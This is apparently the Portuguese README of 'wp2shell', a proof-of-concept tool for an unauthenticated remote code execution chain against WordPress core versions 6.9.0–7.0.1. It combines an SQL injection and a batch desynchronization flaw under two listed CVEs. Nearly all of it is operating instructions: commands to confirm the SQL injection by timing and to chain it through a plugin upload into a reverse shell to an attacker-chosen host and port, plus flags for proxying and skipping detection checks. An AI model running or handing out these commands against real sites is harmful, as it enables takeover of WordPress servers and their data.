
PoC Exploit do WordPress Core Unauthenticated RCE conhecido como WP2Shell
| Nome | wp2shell |
| CVEs | CVE-2026-63030 (dessincronização de lote), CVE-2026-60137 (author__not_in SQLi) |
| Atingido | WordPress 6.9.0 a 6.9.4, 7.0.0 a 7.0.1 |
| Corrigido em | 6.9.5, 7.0.2 |
| Autenticação | Nenhuma |
| Descoberto por | Adam Kues (Searchlight Cyber / Assetnote) |
Host simples = esquema automático (tenta https:// depois http://). Prefixe com http:// ou https:// apenas quando quiser forçar um.
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080
# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/
# timing confirm
wp2shell target.example --confirm-sqli
# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443
| Flag | O que faz |
|---|---|
--shell [LHOST [LPORT]] | cadeia RCE padrão; LHOST padrão é o IP desta máquina, LPORT é 443 |
--rest-route | tente /?rest_route=/batch/v1 primeiro |
--verify-tls | verificar certificados TLS (desligado por padrão para laboratório/autoassinado) |
--proxy URL | enviar tráfego através de um proxy |
--force | pular a identificação de WordPress |